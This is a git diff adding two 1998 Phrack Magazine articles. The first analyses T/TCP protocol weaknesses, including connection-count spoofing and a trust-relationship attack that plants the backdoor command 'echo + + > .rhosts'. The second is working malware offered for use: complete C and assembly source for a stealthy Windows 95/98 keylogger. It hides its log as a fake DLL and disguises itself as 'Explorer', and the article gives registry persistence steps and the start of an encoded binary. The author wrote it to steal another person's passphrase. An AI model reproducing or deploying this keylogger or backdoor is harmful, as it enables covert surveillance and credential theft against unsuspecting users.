+++ b/phrack53/6.txt
@@ -0,0 +1,298 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 06 of 15
+
+
+-------------------------[  T/TCP vulnerabilities
+
+
+--------[  route|daemon9 <route@infonexus.com>
+
+
+----[  Introduction and Impetus
+
+    T/TCP is TCP for Transactions.  It is a backward compatible extension for
+TCP to facilitate faster and more efficient client/server transactions.  T/TCP
+is not in wide deployment but it is in use (see appendix A) and it is supported
+by a handful of OS kernels including: FreeBSD, BSDi, Linux, and SunOS.  This
+article will document the T/TCP protocol in light detail, and then cover some
+weaknesses and vulnerabilities.
+
+
+----[  Background and primer
+
+    TCP is a protocol designed for reliability at the expense of expediency
+(readers unfamiliar with the TCP protocol are directed to the ancient-but-
+still-relevant: http://www.infonexus.com/~daemon9/Misc/TCPIP-primer.txt).
+Whenever an application is deemed to require reliability, it is usually built
+on top of TCP.  This lack of speed is considered a necessary evil.  Short lived
+client/server interactions desiring more speed (short in terms of time vs.
+amount of data flow) are typically built on top of UDP to preserve quick
+response times.  One exception to this rule, of course, is http.  The
+architects of http decided to use the reliable TCP transport for ephemeral
+connections (indeed a poorly designed protocol).
+
+    T/TCP is a small set of extensions to make a faster, more efficient TCP.
+It is designed to be a completely backward compatible set of extensions to
+speed up TCP connections.  T/TCP achieves its speed increase from two major
+enhancements over TCP: TAO and TIME_WAIT state truncation.  TAO is TCP
+Accelerated Open, which introduces new extended options to bypass the 3-way
+handshake entirely.  Using TAO, a given T/TCP connection can approximate a
+UDP connection in terms of speed, while still maintaining the reliability of a
+TCP connection.  In most single data packet exchanges (such is the case with
+transactional-oriented connections like http) the packet count is reduced by a
+third.
+
+    The second speed up is TIME_WAIT state truncation.  TIME_WAIT state
+truncation allows a T/TCP client to shorten the TIME_WAIT state by up to a
+factor of 20.  This can allow a client to make more efficient use of network
+socket primitives and system memory.
+
+
+----[  T/TCP TAO
+
+    TCP accelerated open is how T/TCP bypasses the 3-way handshake.  Before we
+discuss TAO, we need to understand why TCP employs a 3-way handshake.
+According to RFC 793, the principal reason for the exchange is the prevention
+of old duplicate connection initiations wandering into current connections and
+causing confusion.  With this in mind, in order to obviate the need for the
+3-way handshake, there needs to be a mechanism for the receiver of a SYN to
+guarantee that that SYN is in fact new.  This is accomplished with a new
+extended TCP header option, the connection count (CC).
+
+    The CC (referred as tcp_ccgen when on a host) is a simple monotonic
+variable that a T/TCP host keeps and increments for every TCP connection
+created on that host.  Anytime a client host supporting T/TCP wishes to make a
+T/TCP connection to a server, it includes (in it's TAO packet) a CC (or CCnew)
+header option.  If the server supports T/TCP, it will cache that client's
+included CC value and respond with a CCecho option (CC values are cached by
+T/TCP hosts on a per host basis).  If the TAO test succeeds, the 3-way
+handshake is bypassed, otherwise the hosts fall back to the older process.
+
+    The first time a client host supporting T/TCP and a server host supporting
+T/TCP make a connection no CC state exists for that client on that server.
+Because of this fact, the 3-way handshake must be done.  However, also at that
+time, the per host CC cache for that client host is initialized, and all
+subsequent connections can use TAO.  The TAO test on the server simply checks
+to make sure the client's CC is greater then the last received CC from that
+client.  Consider figure 1 below:
+
+      Client                               Server
+T   -----------------------------------------------------------------------
+i   0       --TAO+data--(CC = 2)-->        ClientCC = 1
+m   1                                      2 > 1; TAO test succeeds
+e   2                                      accept data ---> (to application)
+
+                            [ fig 1 ]
+
+    Initially (0) the client sends a TAO encapsulated SYN to the server, with
+a CC of 2.  Since the CC value on the server for this client is 1 (indicating
+they have had previous T/TCP-based communication) the TAO test succeeds (1).
+Since the TAO test was successful, the server can pass the data to application
+layer immediately (2).  If the client's CC had not been greater than the
+server's cached value, the TAO test would have failed and forced the 3-way
+handshake.
+
+
+----[  T/TCP TIME_WAIT truncation
+
+    Before we can see why it is ok to shorten the TIME_WAIT state, we need to
+cover exactly what it is and why it exists.
+
+    Normally, when a client performs an active close on a TCP connection, it
+must hold onto state information for twice the maximum segment lifetime (2MSL) 
+which is usually between 60 - 240 seconds (during this time, the socket pair
+that describes the connection cannot be reused).  It is thought that any
+packet from this connection would be expired (due to IP TTL constraints) from
+the network.  TCP must be consistent with its behavior across all contingencies
+and the TIME_WAIT state guarantees this consistency during the last phase of
+connection closedown.  It keeps old network segments from wandering into a
+connection and causing problems and it helps implement the 4-way closedown
+procedure.  For example, if a wandering packet happens to be a retransmission
+of the servers FIN (presumably due to the clients ACK being lost), the client
+must be sure to retransmit the final ACK, rather then a RST (which it would do
+if it had torn down all the state). 
+
+    T/TCP allows for the truncation of the TIME_WAIT state.  If a T/TCP
+connection only lasts for MSL seconds or less (which is usually the case with
+transactional-oriented connections) the TIME_WAIT state is truncated to as
+little as 12 seconds (8 times the retranmission timeout - RTO).  This is
+allowable from a protocol standpoint because of two things: CC number
+protection against old duplicates and the fact that the 4-way closedown
+procedure packet loss scenario (see above) can be handled by waiting for the
+RTO (multiplied by a constant) as opposed to waiting for a whole 2MSL.
+
+    As long as the connection didn't last any longer then MSL, the CC number
+in the next connection will prevent old packets with an older CC number from
+being accepted.  This will protect connections from old wandering packets
+(if the connection did last longer, it is possible for the CC values to wrap
+and potentially be erroneously delivered to a new incarnation of a connection).
+
+
+----[  Dominance of TAO
+
+    It is easy for an attacker to ensure the success or failure of the TAO
+test.  There are two methods.  The first relies on the second oldest hacking
+tool in the book.  The second is more of a brutish technique, but is just as
+effective.
+
+
+--[  Packet sniffing
+
+    If we are on the local network with one of the hosts, we can snoop the
+current CC value in use for a particular connection.  Since the tcp_ccgen is
+incremented monotonically we can precisely spoof the next expected value by
+incrementing the snooped number.  Not only will this ensure the success of our
+TAO test, but it will ensure the failure of the next TAO test for the client
+we are spoofing.
+
+
+--[  The numbers game
+
+    The other method of TAO dominance is a bit rougher, but works almost as
+well.  The CC is an unsigned 32-bit number (ranging in value from 0 -
+4,294,967,295).  Under all observed implementations, the tcp_ccgen is
+initialized to 1.  If an attacker needs to ensure the success of a TAO
+connection, but is not in a position where s/he can sniff on a local network,
+they should simply choose a large value for the spoofed CC.  The chances that
+one given T/TCP host will burn through even half the tcp_ccgen space with
+another given host is highly unlikely.  Simple statistics tells us that the
+larger the chosen tcp_ccgen is, the greater the odds that the TAO test will
+succeed.  When in doubt, aim high. 
+
+
+----[  T/TCP and SYN flooding
+
+    TCP SYN flooding hasn't changed much under TCP for Transactions.  The
+actual attack is the same; a series of TCP SYNs spoofed from unreachable IP
+addresses.  However, there are 2 major considerations to keep in mind when
+the target host supports T/TCP:
+
+    1) SYN cookie invalidation:  A host supporting T/TCP cannot, at the same
+       time, implement SYN cookies.  TCP SYN cookies are a SYN flood defense
+       technique that works by sending a secure cookie as the sequence number
+       in the second packet of the 3-way handshake, then discarding all state 
+       for that connection.  Any TCP options sent would be lost.  If the final
+       ACK comes in, only then will the host create the kernel socket data
+       structures.  TAO obviously cannot be used with SYN cookies.
+
+    2) Failed TAO processing result in queued data: If the TAO test fails, any
+       data included with that packet will be queued pending the completion of
+       the connection processing (the 3-way handshake).  During a SYN flood,
+       this can make the attack more severe as memory buffers fill up holding
+       this data.  In this case, the attacker would want to ensure the failure
+       of the TAO test for each spoofed packet.
+
+    In a previous Phrack Magazine article, the author erroneously reported that
+T/TCP would help to alleviate SYN flood vulnerability.  This obviously
+incorrect statement was made before copious T/TCP research was done and is
+hereby rescinded.  My bad.
+
+
+----[  T/TCP and trust relationships
+
+    An old attack with a new twist.  The attack paradigm is still the same,
+(readers unfamiliar with trust relationship exploitation are directed to
+P48-14) this time, however, it is easier to wage.  Under T/TCP, there is no
+need to attempt to predict TCP sequence numbers.  Previously, this attack
+required the attacker to predict the return sequence number in order to
+complete the connection establishment processing and move the connection into
+the established state.  With T/TCP, a packet's data will be accepted by the
+application as soon as the TAO test succeeds.  All the attacker needs to do is
+ensure that the TAO test will succeed.  Consider the figure below.
+
+     Attacker                     Server                          Trusted
+    -----------------------------------------------------------------------
+    0         -spoofed-TAO->
+    1                          TAO test succeeds
+T   2                          data to application
+i   3                                            ---TAO-response->
+m   4                                                        no open socket
+e   5                                            <------RST-------
+    6                          tears down connection
+
+                            [ fig 2 ] 
+
+    The attacker first sends a spoofed connection request TAO packet to the
+server.  The data portion of this packet presumably contains the tried and true
+non-interactive backdooring command `echo + + > .rhosts`.  At (1) the TAO test
+succeeds and the data is accepted (2) and passed to application (where it is 
+processed).  The server then sends its T/TCP response to the trusted host (3).
+The trusted host, of course, has no open socket (4) for this connection, and
+responds with the expected RST segment (5).  This RST will teardown the
+attacker's spoofed connection (6) on the server.  If everything went according
+to plan, and the process executing the command in question didn't take too long
+to run, the attacker may now log directly into the server.
+
+    To deal with (5) the attacker can, of course, wage some sort of denial of
+service attack on the trusted host to keep it from responding to the
+unwarranted connection.
+
+
+----[  T/TCP and duplicate message delivery
+
+    Ignoring all the other weaknesses of the protocol, there is one major flaw
+that causes the T/TCP to degrade and behave decidedly NONTCP-like, therefore
+breaking the protocol entirely.  The problem is within the TAO mechanism.
+Certain conditions can cause T/TCP to deliver duplicate data to the
+application layer.  Consider the timeline in figure 3 below:
+
+      Client                               Server
+    -----------------------------------------------------------------------
+    0                    --TAO-(data)--->
+    1                                      TAO test succeeds
+T   2                                      accept data ---> (to application)
+i   3                                      *crash*     (reboot)
+m   4  timeout (resends) --TAO-(data)--->
+e   5                                      TAO test fails (data is queued)
+    6  established       <-SYN-ACK(SYN)--  fallback to 3WHS
+    7                    --ACK(SYN)----->  established (data --> application)
+
+                            [ fig 3 ]
+
+    At time 0 the client sends its TAO encapsulated data to the server (for
+this example, consider that both hosts have had recent communication, and the
+server has defined CC values for the client).  The TAO test succeeds (1) and
+the server passes the data to the application layer for processing (2).
+Before the server can send its response however (presumably an ACK) it crashes
+(3).  The client receives no acknowledgement from the server, so it times out
+and resends its packet (4).  After the server reboots it receives this
+retransmission, this time, however, the TAO test fails and the server queues
+the data (5).  The TAO test failed and forced a 3-way handshake (6) because the
+servers CC cache was invalidated when it rebooted.  After completing the 3-way
+handshake and establishing a connection, the server then passes the queued data
+to the application layer, for a second time.  The server cannot tell that it
+has already accepted this data because it maintains no state after a reboot.
+This violates the basic premise of T/TCP that it must remain completely
+backward compatible with TCP.
+
+
+----[  In closing
+
+    T/TCP is a good idea that just wasn't implemented properly.  TCP was
+not designed to support a connectionless-like paradigm while still
+maintaining reliability and security (TCP wasn't even designed with security
+in mind at all).  T/TCP brings out too many problems and discrete bugs in TCP
+to be anything more then a novelty. 
+
+
+----[  Appendix A: Internet hosts supporting RFC 1644
+
+    This information is ganked from Richard Steven's T/TCP homepage 
+(http://www.kohala.com/~rstevens/ttcp.html).  It is not verfied to be correct.
+    - www.ansp.br
+    - www.elite.net
+    - www.iqm.unicamp.br
+    - www.neosoft.com
+    - www.sbq.org.br
+    - www.uidaho.edu
+    - www.yahoo.com
+
+
+----[  Appendix B: Bibliography
+
+    1) Braden, R. T. 1994 "T/TCP - TCP Extensions for Transactions...", 38 p
+    2) Braden, R. T. 1992 "Extending TCP for Transactions - Concepts...", 38 p
+    3) Stevens, W. Richard. 1996 "TCP Illustrated volume III", 328 p
+    4) Smith, Mark. 1996, "Formal verification of Communication...", 15 p
+
+
+----[  EOF
diff --git a/phrack53/7.txt b/phrack53/7.txt
new file mode 100644
index 0000000..f797f17
--- /dev/null
+++ b/phrack53/7.txt
@@ -0,0 +1,650 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 07 of 15
+
+
+-------------------------[  A Stealthy Windows Keylogger
+
+
+--------[  markj8@usa.net
+
+
+    I recently felt the need to acquire some data being typed into Windows95
+machines on a small TCP-IP network.  I had occasional physical access to the
+machines and I knew the remote administration password, but the files were
+being saved in BestCryptNP volumes, the passphrase for which I didn't know...
+
+    I searched the Net as best I could for a suitable keylogging program that
+would allow me to capture the passphrase without being noticed, but all I
+could find was I big boggy thing written in visual basic that insisted on
+opening a window.  I decided to write my own.  I wanted to write it as a VXD
+because they run at Privilege Level 0 and can do just about ANYTHING.  I soon
+gave up on this idea because I couldn't acquire the correct tools and certainly
+couldn't afford to buy them.
+
+    While browsing through the computer section of my local public library one
+day I noticed a rather thin book called "WINDOWS ASSEMBLY LANGUAGE and SYSTEMS
+PROGRAMMING" by Barry Kauler, (ISBN 0 13 020207 X) c 1993.  A quick flick
+through the Table of Contents revealed "Chapter 10: Real-Time Events, Enhanced
+Mode Hardware Interrupts".  I immediately borrowed the book and photocopied
+it (Sorry about the royalties Barry).  As I read chapter 10 I realized that
+all I needed was a small 16 bit Windows program running as a normal user
+process to capture every keystroke typed into windows.  The only caveat was
+that keystrokes typed into DOS boxes wouldn't be captured.  Big deal.  I could
+live without that.  I was stunned to discover that all user programs in Windows
+share a single Interrupt Descriptor Table (IDT).  This implies that if one
+user program patches a vector in the IDT, then all other programs are
+immediately affected.
+
+    The only tool I had for generating windows executables was Borland C Ver
+2.0 which makes small and cute windows 3.0 EXE's, so that's what I used.  I
+have tested it on Windows for Workgroups 3.11, Windows 95 OSR2, and Windows 98
+beta 3.  It will probably work on Windows 3.x as well.
+
+    As supplied, it will create a hidden file in the \WINDOWS\SYSTEM directory
+called POWERX.DLL and record all keystrokes into it using the same encoding
+scheme as Doc Cypher's KEYTRAP3.COM program for DOS.  This means that you can
+use the same conversion program, CONVERT3.C, to convert the raw scancodes in
+the log file to readable ASCII.  I have included a slightly "improved" version
+of CONVERT3.C with a couple of bugs fixed.  I contemplated incorporating the
+functionality of CONVERT3 into W95Klog, but decided that logging scancodes
+was "safer" that logging plain ASCII.  If the log file is larger that 2
+megabytes when the program starts, it will be deleted and re-created with
+length zero.  When you press CTRL-ALT-DEL (in windows95/98) to look at the
+Task List, W95Klog will show up as "Explorer".  You can change this by editing
+the .DEF file and recompiling, or by HEX Editing the .EXE file.  If anyone
+knows how to stop a user program from showing on this list please tell me.
+
+    To cause the target machine to run W95Klog every time it starts Windows
+you can:
+
+  1) Edit win.ini, [windows] section to say run=WHLPFFS.EXE or some such
+confusing name :)   Warning!  This will cause a nasty error message if
+WHLPFFS.EXE can't be found.  This method has the advantage of being able to be
+performed over the network via "remote administration" without the need for
+both computers to be running "remote registry service".
+
+  2) Edit the registry key: (Win95/98)
+`HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run` and create
+a new key called whatever you like with a string value of "WHLPFFS.EXE" or
+whatever.  This is my preferred method because it is less likely to be stumbled
+upon by the average user and windows continues without complaint if the
+executable can't be found.  The log file can be retrieved via the network even
+when it is still open for writing by the logging program.  This is very
+convenient ;).
+
+
+<++> EX/win95log/convert.c
+//
+// Convert v3.0
+// Keytrap logfile converter.
+// By dcypher <dcypher@mhv.net>
+// MSVC++1.52 (Or Borland C 1.01, 2.0 ...)
+// Released: 8/8/95
+// 
+// Scancodes above 185(0xB9) are converted to "<UK>", UnKnown.
+//
+
+#include <stdio.h>
+
+#define MAXKEYS 256
+#define WS 128
+
+const char *keys[MAXKEYS];
+
+void main(int argc,char *argv[])
+{     
+      FILE *stream1;
+      FILE *stream2;
+
+ 	unsigned int Ldata,Nconvert=0,Yconvert=0;
+        char logf_name[100],outf_name[100];
+  	
+  	//
+ 	// HERE ARE THE KEY ASSIGNMENTS !!
+ 	//
+ 	// You can change them to anything you want. 
+ 	// If any of the key assignments are wrong, please let
+ 	// me know. I havn't checked all of them, but it looks ok.
+ 	//
+ 	//   v--- Scancodes logged by the keytrap TSR
+ 	//          v--- Converted to the string here
+ 	 	 	       
+ 	keys[1]  = "<uk>";	  				
+ 	keys[2]  = "1";   		 
+ 	keys[3]  = "2";    	 
+ 	keys[4]  = "3";
+ 	keys[5]  = "4";
+ 	keys[6]  = "5";
+ 	keys[7]  = "6";
+ 	keys[8]  = "7";
+	keys[9]  = "8";
+ 	keys[10] = "9";
+ 	keys[11] = "0";
+ 	keys[12] = "-";
+ 	keys[13] = "=";
+ 	keys[14] = "<bsp>";
+ 	keys[15] = "<tab>";
+ 	keys[16] = "q";
+ 	keys[17] = "w";
+ 	keys[18] = "e";
+ 	keys[19] = "r";
+ 	keys[20] = "t";
+ 	keys[21] = "y";
+ 	keys[22] = "u";
+ 	keys[23] = "i";
+ 	keys[24] = "o";
+	keys[25] = "p";
+ 	keys[26] = "[";  /* = ^Z  Choke! */
+ 	keys[27] = "]";
+ 	keys[28] = "<ret>"; 	
+ 	keys[29] = "<ctrl>";
+ 	keys[30] = "a";
+ 	keys[31] = "s"; 	
+ 	keys[32] = "d";
+ 	keys[33] = "f";
+ 	keys[34] = "g";
+ 	keys[35] = "h";
+ 	keys[36] = "j";
+ 	keys[37] = "k";
+ 	keys[38] = "l";
+ 	keys[39] = ";"; 	
+ 	keys[40] = "'";
+ 	keys[41] = "`";
+ 	keys[42] = "<LEFT SHIFT>"; // left shift - not logged by the tsr
+ 	keys[43] = "\\";           //			 and not converted
+ 	keys[44] = "z";
+ 	keys[45] = "x";
+ 	keys[46] = "c";
+ 	keys[47] = "v";
+ 	keys[48] = "b";
+ 	keys[49] = "n";
+ 	keys[50] = "m";
+ 	keys[51] = ",";
+ 	keys[52] = ".";
+ 	keys[53] = "/";
+ 	keys[54] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr
+ 	keys[55] = "*";             // 		   and not converted
+ 	keys[56] = "<alt>";
+ 	keys[57] = " ";         
+ 	
+ 	// now show with shift key
+ 	// the TSR adds 128 to the scancode to show shift/caps
+
+ 	keys[1+WS]  = "[";  /* was "<unknown>" but now fixes ^Z problem */	  				
+ 	keys[2+WS]  = "!";   		 
+ 	keys[3+WS]  = "@";    	 
+ 	keys[4+WS]  = "#";
+ 	keys[5+WS]  = "$";
+ 	keys[6+WS]  = "%";
+ 	keys[7+WS]  = "^";
+ 	keys[8+WS]  = "&";
+	keys[9+WS]  = "*";
+ 	keys[10+WS] = "(";
+ 	keys[11+WS] = ")";
+ 	keys[12+WS] = "_";
+ 	keys[13+WS] = "+";
+ 	keys[14+WS] = "<shift+bsp>";
+ 	keys[15+WS] = "<shift+tab>";
+  	keys[16+WS] = "Q";
+ 	keys[17+WS] = "W";
+ 	keys[18+WS] = "E";
+ 	keys[19+WS] = "R";
+ 	keys[20+WS] = "T";
+ 	keys[21+WS] = "Y";
+ 	keys[22+WS] = "U";
+ 	keys[23+WS] = "I";
+ 	keys[24+WS] = "O";
+	keys[25+WS] = "P";
+ 	keys[26+WS] = "{";
+ 	keys[27+WS] = "}";
+ 	keys[28+WS] = "<shift+ret>";
+ 	keys[29+WS] = "<shift+ctrl>";
+ 	keys[30+WS] = "A";
+ 	keys[31+WS] = "S"; 	
+ 	keys[32+WS] = "D";
+ 	keys[33+WS] = "F";
+ 	keys[34+WS] = "G";
+ 	keys[35+WS] = "H";
+ 	keys[36+WS] = "J";
+ 	keys[37+WS] = "K";
+ 	keys[38+WS] = "L";
+ 	keys[39+WS] = ":"; 	
+ 	keys[40+WS] = "\"";
+ 	keys[41+WS] = "~";
+ 	keys[42+WS] = "<LEFT SHIFT>"; // left shift - not logged by the tsr
+ 	keys[43+WS] = "|";            //     	    and not converted
+  	keys[44+WS] = "Z";
+ 	keys[45+WS] = "X";
+ 	keys[46+WS] = "C";
+ 	keys[47+WS] = "V";
+ 	keys[48+WS] = "B";
+ 	keys[49+WS] = "N";
+ 	keys[50+WS] = "M";
+  	keys[51+WS] = "<";
+ 	keys[52+WS] = ">";
+ 	keys[53+WS] = "?";
+ 	keys[54+WS] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr
+ 	keys[55+WS] = "<shift+*>";     //			and not converted
+ 	keys[56+WS] = "<shift+alt>";
+ 	keys[57+WS] = " ";
+ 	 	 	 	           	     
+     	printf("\n");
+ 	printf("Convert v3.0\n");
+ 	// printf("Keytrap logfile converter.\n");
+ 	// printf("By dcypher <dcypher@mhv.net>\n\n");
+ 	printf("Usage: CONVERT infile outfile\n");
+ 	printf("\n");
+ 	
+ 	if (argc==3)
+ 	{
+  		strcpy(logf_name,argv[1]);
+ 		strcpy(outf_name,argv[2]);
+ 	}
+ 	
+ 	else
+ 	{
+      	printf("Enter infile name: ");
+                scanf("%99s",&logf_name);
+ 		printf("Enter outfile name: ");
+                scanf("%99s",&outf_name);
+ 		printf("\n");
+  	}
+  		
+	stream1=fopen(logf_name,"rb");
+	stream2=fopen(outf_name,"a+b");
+
+	if (stream1==NULL || stream2==NULL)
+	{
+		if (stream1==NULL)
+			printf("Error opening: %s\n\a",logf_name);
+		else
+			printf("Error opening: %s\n\a",outf_name);
+	}
+	
+	else
+	{
+		fseek(stream1,0L,SEEK_SET);
+		printf("Reading data from: %s\n",logf_name);
+		printf("Appending information to..: %s\n",outf_name);
+		
+		while (feof(stream1)==0)
+			{
+				Ldata=fgetc(stream1);	
+				
+				if (Ldata>0
+				&& Ldata<186)
+				{	
+					if (Ldata==28 || Ldata==28+WS)
+					{	
+						fputs(keys[Ldata],stream2);
+						fputc(0x0A,stream2);
+						fputc(0x0D,stream2);
+						Yconvert++;
+					}	
+					else					
+						fputs(keys[Ldata],stream2);
+						Yconvert++;
+				}
+				else
+				{     
+					fputs("<UK>",stream2);
+					Nconvert++;
+				}
+					
+			}
+	}
+	
+      fflush(stream2);  
+	printf("\n\n");
+	printf("Data converted....: %i\n",Yconvert);
+	printf("Data not converted: %i\n",Nconvert); 	
+	printf("\n");	
+	printf("Closeing  infile: %s\n",logf_name);
+	printf("Closeing outfile: %s\n",outf_name);
+      fclose(stream1);
+	fclose(stream2);
+}
+
+<-->
+<++> EX/win95log/W95Klog.c
+/*
+ * W95Klog.C   Windows stealthy keylogging program
+ */
+
+/*
+ * This will ONLY compile with BORLANDC V2.0 small model.
+ * For other compilers you will have to change newint9()
+ * and who knows what else :)
+ *
+ * Captures ALL interesting keystrokes from WINDOWS applications
+ * but NOT from DOS boxes.
+ * Tested OK on WFW 3.11, Win95 OSR2 and Win98 Beta 3.
+ */
+
+#include <windows.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <dos.h>
+
+//#define LOGFILE "~473C96.TMP" //Name of log file in WINDOWS\TEMP
+#define LOGFILE "POWERX.DLL"    //Name of log file in WINDOWS\SYSTEM
+#define LOGMAXSIZE 2097152      //Max size of log file (2Megs)
+
+#define HIDDEN 2
+#define SEEK_END 2
+
+#define NEWVECT 018h       // "Unused" int that is used to call old
+                           // int 9 keyboard routine.
+                           // Was used for ROMBASIC on XT's
+                           // Change it if you get a conflict with some
+                           //  very odd program.  Try 0f9h.
+
+/************* Global Variables in DATA SEGment ****************/
+
+HWND                 hwnd;        // used by newint9()
+unsigned int         offsetint;   // old int 9 offset
+unsigned int         selectorint; // old int 9 selector
+unsigned char        scancode;    // scan code from keyboard
+
+//WndProc
+char sLogPath[160];
+int  hLogFile;
+long lLogPos;
+char sLogBuf[10];
+
+//WinMain
+char szAppName[]="Explorer";
+MSG         msg;
+WNDCLASS    wndclass;
+
+/***************************************************************/
+
+//
+//__________________________
+void interrupt newint9(void)  //This is the new int 9 (keyboard) code
+	                 // It is a hardware Interrupt Service Routine. (ISR)
+{
+scancode=inportb(0x60);
+if((scancode<0x40)&&(scancode!=0x2a)) {
+  if(peekb(0x0040, 0x0017)&0x40) { //if CAPSLOCK is active
+    // Now we have to flip UPPER/lower state of A-Z only! 16-25,30-38,44-50
+    if(((scancode>15)&&(scancode<26))||((scancode>29)&&(scancode<39))||
+                       ((scancode>43)&&(scancode<51)))  //Phew!
+      scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program
+    }//if CAPSLOCK
+  if(peekb(0x0040, 0x0017)&3)  //if any shift key is pressed...
+    scancode^=128;   //bit 7 indicates SHIFT state to CONVERT.C program
+  if(scancode==26)   //Nasty ^Z bug in convert program
+    scancode=129;    //New code for "["
+
+  //Unlike other Windows functions, an application may call PostMessage
+  // at the hardwareinterrupt level. (Thankyou Micr$oft!)
+  PostMessage(hwnd, WM_USER, scancode, 0L); //Send scancode to WndProc()
+  }//if scancode in range
+
+  asm {  //This is very compiler specific, & kinda ugly!
+      pop bp
+      pop di
+      pop si
+      pop ds
+      pop es
+      pop dx
+      pop cx
+      pop bx
+      pop ax
+      int NEWVECT       // Call the original int 9 Keyboard routine
+      iret              // and return from interrupt
+      }
+}//end newint9
+
+
+//This is the "callback" function that handles all messages to our "window"
+//_____________________________________________________________________
+long FAR PASCAL WndProc(HWND hwnd,WORD message,WORD wParam,LONG lParam)
+  {
+
+//asm int 3;         //For Soft-ice debugging
+//asm int 18h;       //For Soft-ice debugging
+
+  switch(message) {
+    case WM_CREATE:  // hook the keyboard hardware interupt
+      asm {
+          pusha
+          push es
+          push ds
+                           // Now get the old INT 9 vector and save it...
+          mov al,9
+          mov ah,35h       // into ES:BX
+          int 21h
+          push es
+          pop ax
+          mov offsetint,bx  // save old vector in data segment
+          mov selectorint,ax //     /
+          mov dx,OFFSET newint9  // This is an OFFSET in the CODE segment
+          push cs
+          pop ds            // New vector in DS:DX
+          mov al,9
+          mov ah,25h
+          int 21h           // Set new int 9 vector
+          pop ds            // get data seg for this program
+          push ds
+                            // now hook unused vector
+                            //  to call old int 9 routine
+          mov dx,offsetint
+          mov ax,selectorint
+          mov ds,ax
+          mov ah,25h
+          mov al,NEWVECT
+          int 21h
+                            // Installation now finished
+          pop ds
+          pop es
+          popa
+          } // end of asm
+
+      //Get path to WINDOWS directory
+      if(GetWindowsDirectory(sLogPath,150)==0) return 0;
+
+      //Put LOGFILE on end of path
+      strcat(sLogPath,"\\SYSTEM\\");
+      strcat(sLogPath,LOGFILE);
+      do {
+        // See if LOGFILE exists
+        hLogFile=_lopen(sLogPath,OF_READ);
+        if(hLogFile==-1) { // We have to Create it
+          hLogFile=_lcreat(sLogPath,HIDDEN);
+          if(hLogFile==-1) return 0; //Die quietly if can't create LOGFILE
+          }
+        _lclose(hLogFile);
+
+        // Now it exists and (hopefully) is hidden....
+        hLogFile=_lopen(sLogPath,OF_READWRITE); //Open for business!
+        if(hLogFile==-1) return 0; //Die quietly if can't open LOGFILE
+        lLogPos=_llseek(hLogFile,0L,SEEK_END); //Seek to the end of the file
+        if(lLogPos==-1) return 0; //Die quietly if can't seek to end
+        if(lLogPos>LOGMAXSIZE) {  //Let's not fill the harddrive...
+          _lclose(hLogFile);
+          _chmod(sLogPath,1,0);
+          if(unlink(sLogPath)) return 0; //delete or die
+          }//if file too big
+        } while(lLogPos>LOGMAXSIZE);
+      break;
+
+    case WM_USER:        // A scan code....
+      *sLogBuf=(char)wParam;
+      _write(hLogFile,sLogBuf,1);
+      break;
+
+    case WM_ENDSESSION:  // Is windows "restarting" ?
+    case WM_DESTROY:     // Or are we being killed  ?
+    asm{
+        push    dx
+        push    ds
+        mov     dx,offsetint
+        mov     ds,selectorint
+        mov     ax,2509h
+        int     21h           //point int 09 vector back to old
+        pop     ds
+        pop     dx
+        }
+      _lclose(hLogFile);
+      PostQuitMessage(0);
+      return(0);
+    } //end switch
+
+     //This handles all the messages that we don't want to know about
+     return DefWindowProc(hwnd,message,wParam,lParam);
+     }//end WndProc
+
+/**********************************************************/
+int PASCAL WinMain (HANDLE hInstance, HANDLE hPrevInstance,
+                    LPSTR lpszCmdParam, int nCmdShow)
+    {
+
+    if (!hPrevInstance) {  //If there is no previous instance running...
+      wndclass.style         = CS_HREDRAW | CS_VREDRAW;
+      wndclass.lpfnWndProc   = WndProc; //function that handles messages
+                                        // for this window class
+      wndclass.cbClsExtra    = 0;
+      wndclass.cbWndExtra    = 0;
+      wndclass.hInstance     = hInstance;
+      wndclass.hIcon         = NULL;
+      wndclass.hCursor       = NULL;
+      wndclass.hbrBackground = NULL;
+      wndclass.lpszClassName = szAppName;
+
+      RegisterClass (&wndclass);
+
+      hwnd = CreateWindow(szAppName,   //Create a window
+                  szAppName,           //window caption
+                  WS_OVERLAPPEDWINDOW, //window style
+                  CW_USEDEFAULT,       //initial x position
+                  CW_USEDEFAULT,       //initial y position
+                  CW_USEDEFAULT,       //initial x size
+                  CW_USEDEFAULT,       //initial y size
+                  NULL,                //parent window handle
+                  NULL,                //Window Menu handle
+                  hInstance,           //program instance handle
+                  NULL);               //creation parameters
+
+      //ShowWindow(hwnd,nCmdShow);     //We don't want  no
+      //UpdateWindow(hwnd);            // stinking window!
+
+      while (GetMessage(&msg,NULL,0,0)) {
+        TranslateMessage(&msg);
+        DispatchMessage(&msg);
+        }
+      }//if no previous instance of this program is running...
+    return msg.wParam;  //Program terminates here after falling out
+    } //End of WinMain        of the while() loop.
+<-->
+<++> EX/win95log/W95KLOG.DEF
+;NAME is what shows in CTRL-ALT-DEL Task list... hmmmm
+NAME           Explorer
+DESCRIPTION    'Explorer'
+EXETYPE        WINDOWS
+CODE           PRELOAD FIXED
+DATA           PRELOAD FIXED SHARED
+HEAPSIZE       2048
+STACKSIZE      8096
+<-->
+<++> EX/win95log/W95KLOG.EXE.uue
+begin 600 W95KLOG.EXE
+M35H"`08````$``\`__\``+@`````````0```````````````````````````
+M````````````````````D````+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R
+M86T@;75S="!B92!R=6X@=6YD97(@36EC<F]S;V9T(%=I;F1O=W,N#0HD````
+M````````````3D4%"FT``@```````@,"```(H!\```$````"``(``@`,`$``
+M4`!0`%P`8`#_```````)`````@@!``<``````P(`U05`#=4%!@`F`F$,)@((
+M17AP;&]R97(````!``@```9+15).14P$55-%4@``"$5X<&QO<F5R````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
+M````````````````````````````````````````````````````````````
